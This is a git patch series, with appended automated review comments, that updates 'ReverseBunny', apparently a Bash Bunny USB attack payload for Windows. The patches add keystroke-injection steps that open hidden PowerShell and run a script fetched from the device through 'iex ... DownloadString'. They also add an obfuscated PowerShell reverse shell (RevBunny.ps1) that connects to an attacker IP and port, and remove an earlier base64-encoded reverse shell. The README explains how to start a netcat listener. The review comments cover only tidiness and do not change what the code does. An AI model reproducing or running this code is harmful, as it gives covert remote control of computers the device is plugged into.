From cad78b52f29f9c4b0799f6a5d0cb2cd5b695b015 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 25 Jan 2023 11:44:22 +0100 Subject: [PATCH 1/5] Update payload.txt --- .../remote_access/ReverseBunny/payload.txt | 53 +++++++++---------- 1 file changed, 25 insertions(+), 28 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 9cabc845..7c51d62c 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt 
@@ -1,47 +1,44 @@ #!/bin/bash # # Title: ReverseBunny -# Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me. +# Description: Get remote access, using an obfuscated powershell reverse shell. # Author: 0iphor13 -# Version: 1.3 +# Version: 1.5 # Category: Remote_Access -# Attackmodes: HID +# Attackmodes: HID, RNDIS_ETHERNET LED SETUP +ATTACKMODE RNDIS_ETHERNET HID -DUCKY_LANG de +GET SWITCH_POSITION +GET HOST_IP -ATTACKMODE HID +cd /root/udisk/payloads/$SWITCH_POSITION/ -#If needed, use this option -#WAIT_FOR_PRESENT Your_Device +# starting server +LED SPECIAL +# disallow outgoing dns requests so the server is accessible immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done + +#Opens hidden powershell instance Q DELAY 1500 Q GUI r Q DELAY 500 -Q STRING "powershell -NoP -NonI -W hidden" +Q STRING "powershell -NoP -NonI -w h" Q DELAY 500 Q ENTER -Q DELAY 250 -Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I" -Q DELAY 250 -Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH" -Q DELAY 250 -Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R" -Q DELAY 250 -Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ" -Q DELAY 250 -Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf" -Q DELAY 250 -Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN" -Q DELAY 250 -Q STRING 
"eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ" -Q DELAY 250 -Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp" -Q DELAY 250 -Q STRING "ReSS ) | %{ NEw-ObJECt systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )" -Q DELAY 250 -Q ENTER +Q DELAY 500 +#Insert attacking IP +Q STRING "\$I='192.168.178.25';\$P=4444;" +Q DELAY 250 +Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RevBunny.ps1\")" +Q DELAY 400 +Q ENTER LED FINISH From 04b4f794b76e6aefe9d3fb43871a5804d4f41c35 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 25 Jan 2023 11:44:56 +0100 Subject: [PATCH 2/5] Update payload.txt --- payloads/library/remote_access/ReverseBunny/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 7c51d62c..75d003cc 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -35,8 +35,8 @@ Q ENTER Q DELAY 500 -#Insert attacking IP -Q STRING "\$I='192.168.178.25';\$P=4444;" +#Insert attacking IP & Port below +Q STRING "\$I='0.0.0.0';\$P=4444;" Q DELAY 250 Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RevBunny.ps1\")" Q DELAY 400 From 2f1545eb35572ec2b5a492bee7304556f51a8af2 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 25 Jan 2023 11:49:50 +0100 Subject: [PATCH 3/5] Update README.md --- .../remote_access/ReverseBunny/README.md | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) 
diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index 5cd530b3..6a1b7f98 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -1,17 +1,13 @@ -**Title: ReverseBunny** +**Title: ReverseBunny** -Author: 0iphor13 - -Version: 1.3 +

Author: 0iphor13
+OS: Windows
+Version: 1.5

Getting remote access via obfuscated reverse shell.
+Upload payload.txt and RevBunny.ps1 onto your Bunny +![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png) Change the variables in payload.txt to your attacking maschine & start your listener. (for example netcat: nc -lvnp [PORT] )

-Whats new in version 1.3? -- Changed the whole payload -- Added custom shell design - -Coming soon: -- Custom commands -- New evasion technique +A pressed CAPSLOCK button as also an indicator light on the bunny will indicate the payloads successfull execution From ac2925419cf2ac5d1700f245b1c99377562530cb Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 25 Jan 2023 11:50:47 +0100 Subject: [PATCH 4/5] added picture and RevBunny.ps1 --- .../remote_access/ReverseBunny/RevBunny.png | Bin 0 -> 10217 bytes .../remote_access/ReverseBunny/RevBunny.ps1 | 25 ++++++++++++++++++ 2 files changed, 25 insertions(+) create mode 100644 payloads/library/remote_access/ReverseBunny/RevBunny.png create mode 100644 payloads/library/remote_access/ReverseBunny/RevBunny.ps1 
diff --git a/payloads/library/remote_access/ReverseBunny/RevBunny.png b/payloads/library/remote_access/ReverseBunny/RevBunny.png new file mode 100644 index 0000000000000000000000000000000000000000..f6f080d316f549ed3dab49bef1f3260d8861f42a GIT binary patch literal 10217
literal 0 HcmV?d00001 diff --git a/payloads/library/remote_access/ReverseBunny/RevBunny.ps1 b/payloads/library/remote_access/ReverseBunny/RevBunny.ps1 new file mode 100644 index 00000000..0c78dcd8 --- /dev/null +++ b/payloads/library/remote_access/ReverseBunny/RevBunny.ps1 
@@ -0,0 +1,25 @@ + .("{1}{0}" -f't','SE') ("mAI"+"h") ([tYpE]("{1}{0}"-F'Y','ArrA')) ; &("{0}{3}{1}{2}"-f 'se','r','IABLe','t-vA') eU92 ([TYPE]("{0}{1}" -F'sT','RiNG') );.("{0}{1}"-f 'S','et') (("{1}{0}" -f 'W','f83')+'R'+'0') ( [cHaR[ ]]" ))63]rahc[]GNirTs[,'Pou'(ECalPEr.)'\',)88]rahc[+27]rahc[+97]rahc[((ECalPEr.)93]rahc[]GNirTs[,'4EC'(ECalPEr.)'|',)711]rahc[+86]rahc[+76]rahc[((ECalPEr.)43]rahc[]GNirTs[,)28]rahc[+001]rahc[+911]rahc[((ECalPEr.)' + + +TIXE;)(ESolC.cPou;'+'})(hSUlF.sPou;)hTGnEL.yPou,0,yPou(etIrW.sPou;)xPou(sETyBtEG.)IICSA::]gnidocne.txet[(='+'yPou;Rdw >Rdw+)'+'noitacoL-te'+'G(+Rdw SP@yn'+'nuBRdw+zPou=xPou;)GNirTS-'+'tUouDC1&>2 dPou Xei(=zPou;)iPo'+'u,0,bPou(gnIRtSteG.)gnidocnEIICSA.tXeT.MeTsYs EmaNepYT'+'- TCejBO-wEN(=dPou;{)0 en-)'+')hTgNeL.bP'+'ou,0,bPou(daER.sPou=iPou((eLIhw;}0{%uDC53556..0=bPou]][etyb[;)htgneL'+'.trA'+'ynnuBveRPou,0,trAynnuBveRPou(etirw.sPou;)(mAerTSteG.cPou=sPou;)PPou,IPou(tnE'+'IlCPCT.stEKcOS.tEN.mEtsYS tCEjBo-wEn=c'+'Pou +)4EC}KCOLSPAC{4EC(syeKdneS.hswPo'+'u +;)ynnubPou(setyBteG.IICSA::]gnidocnE'+'.txeT[ = trAynnuBveRPou +llehS.tpircSW tcejbOmoC- tcejbO-we'+'N = hswPou +;@Rdw + +...eunitnoc ot ]ret'+'nE[ sserP + +/___uDC 31rohpi0 yB '+' +uDC /__ '+' '+' +uDC ,__XHOuDC_u'+'DC uDC_'+'uDC_uDC uDC_uDC_,__XHO /____XHO___XHO/___uDC uDC_uDC___'+'XHO /_XHO uDC___XHO_'+'XHO uDC_XHO +uDC uDC_uDC uDC uDC uDC uDC uD'+'C uDC uDC uDC_uDC'+' uDC /_uDC uDC'+'__ uDC __XHO uDC uDC__ uDC V XHO/__ uDC XHOuDC uDC +uDC u'+'DC uDC uDCXHO _4EC uDCXHO _4E'+'C uDC uDC uDC '+'uDC ___ uDC _ /uDC_'+'_ /__4EC uDC _ / / XHO XHO _ // uDC + _ _ __ _ __ _ _ _/ /_uDC '+'uDC___ ___ __ _ _____ '+'_____/ /_uDC uDC + XHO ___ uDC '+' '+' XHO'+' _'+'__ uDC'+' + ______'+' '+' ______ +)Rdw(_)Rdw( + )=4EC.4EC=( + )/___XHO( + +Rdw@=ynnub'+'Pou'((xEI " ) ; ( .("{1}{2}{0}" -f '-ITEM','G','Et') ('VAR'+'IABLe:'+'M'+'aiH')).vaLue::("{1}{0}"-f'se','reVer').Invoke(( &('Gi') (("{3}{2}{1}{0}" -f ':f','ABLE','RI','VA')+'83w'+'R0'))."v`AlUe" ) ; (.("{0}{2}{1}"-f 'vA','E','RIaBl') 
eu92 -VaL)::("{0}{1}" -f'Joi','N').Invoke('' ,( &('Gi') (("{2}{1}{0}" -f':f','E','VARIABL')+'83w'+'R0'))."Val`Ue") |&("{1}{0}" -f 'EX','I') + From 1c166e2343b6feb085a592b0622315556e3be265 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 25 Jan 2023 11:52:58 +0100 Subject: [PATCH 5/5] Update README.md --- payloads/library/remote_access/ReverseBunny/README.md | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index 6a1b7f98..d3b39a26 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -5,9 +5,11 @@ OS: Windows
Version: 1.5
-

Getting remote access via obfuscated reverse shell.
+

!Getting remote access via obfuscated reverse shell!
Upload payload.txt and RevBunny.ps1 onto your Bunny -![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png) -Change the variables in payload.txt to your attacking maschine & start your listener. (for example netcat: nc -lvnp [PORT] )

-A pressed CAPSLOCK button as also an indicator light on the bunny will indicate the payloads successfull execution +![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png) + +Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )

+ +A pressed CAPSLOCK key as also an indicator light on the bunny will indicate the payloads successfull execution
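
Review bot: In [PATCH 1/5] (payload.txt), nothing undoes the `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule or the backgrounded `python -m SimpleHTTPServer 80 &` before `LED FINISH`, so the device is left with outbound DNS dropped and a web server still serving everything under `/root/udisk/payloads/$SWITCH_POSITION/`, payload.txt included, after the payload reports completion. Keep the server's PID and stop it, and remove the rule with the matching `iptables -D`, before the final LED state. The `while ! nc -z localhost 80` wait also has no upper bound, so a failed bind on port 80 leaves the payload stuck at `LED SPECIAL` with no failure indication.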
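
Review bot: [PATCH 2/5] (payload.txt, hunk at line 35) exists only to replace the `192.168.178.25` that [PATCH 1/5] committed three minutes earlier with the `0.0.0.0` placeholder; squash it into 1/5 so the concrete address never enters the library's history. The new comment `#Insert attacking IP & Port below` should also name the two variables it refers to (`$I` and `$P`) and say that `0.0.0.0` is a placeholder that must be edited, since nothing in the file checks for it.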
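
Review bot: In [PATCH 3/5] (README.md), the added image link points at `https://github.com/0iphor13/bashbunny-payloads/blob/master/...`, an absolute `blob` URL into the author's fork rather than a path inside this repository, so the README depends on that fork staying in place; use the relative path `RevBunny.png` instead. The README also tells the reader to upload `RevBunny.ps1` and shows `RevBunny.png`, but both files are only created in [PATCH 4/5], so at this commit the documentation refers to files that are not in the tree; reorder the series or fold the README change into the patch that adds the files. The removed "Whats new" section leaves no record of what changed between 1.3 and 1.5, in particular that the payload now requires `RNDIS_ETHERNET` and serves a second stage over HTTP.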
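
Review bot: The 25 lines added as RevBunny.ps1 in [PATCH 4/5] are committed only in obfuscated form (strings assembled with the `-f` format operator, a reversed character array passed through a reassembled `reVer`+`se` call, and a final pipe into `("{1}{0}" -f 'EX','I')`), so the diff cannot be reviewed for what it actually executes on the target. For a shared payload library the readable source should be submitted alongside it, or at minimum the README should state exactly what the script does (connection target variables, the `{CAPSLOCK}` keystroke, the banner), so maintainers and users can verify the obfuscated file matches the description before running it.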
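
Review bot: [PATCH 5/5] (README.md) fixes "maschine" and "button" but leaves the last added line reading "as also an indicator light" and "the payloads successfull execution"; it should read "as well as", "payload's" and "successful". The new line `!Getting remote access via obfuscated reverse shell!` starts with a bare `!`, which sits directly above an actual `![alt text](...)` image and reads like broken image syntax; drop the exclamation marks or use the README's existing `**...**` emphasis. The image link is still the absolute `blob/master` URL into the author's fork introduced in 3/5 and should become a relative path.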